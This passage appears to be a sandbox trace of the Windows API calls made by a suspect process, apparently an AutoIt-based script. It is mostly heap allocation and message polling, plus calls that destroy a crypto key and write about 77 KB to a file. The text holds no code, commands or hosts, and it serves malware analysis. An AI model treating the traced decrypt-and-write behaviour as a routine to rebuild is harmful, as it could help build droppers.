Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0211.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0211.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0211.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.666] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0211.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0211.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0211.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.666] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.666] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.667] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.679] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x12cf8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x12cf8, lpOverlapped=0x0) returned 1 [0211.685] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.685] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.685] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0211.685] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.685] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50920, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.686] CryptDestroyKey (hKey=0xa87290) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.687] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.688] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.688] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.688] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0211.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0211.688] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0211.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0211.689] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0211.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0211.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0211.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0211.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0211.690] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.690] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0211.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0211.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0211.691] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0211.691] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.691] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.691] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0211.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0211.692] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.692] 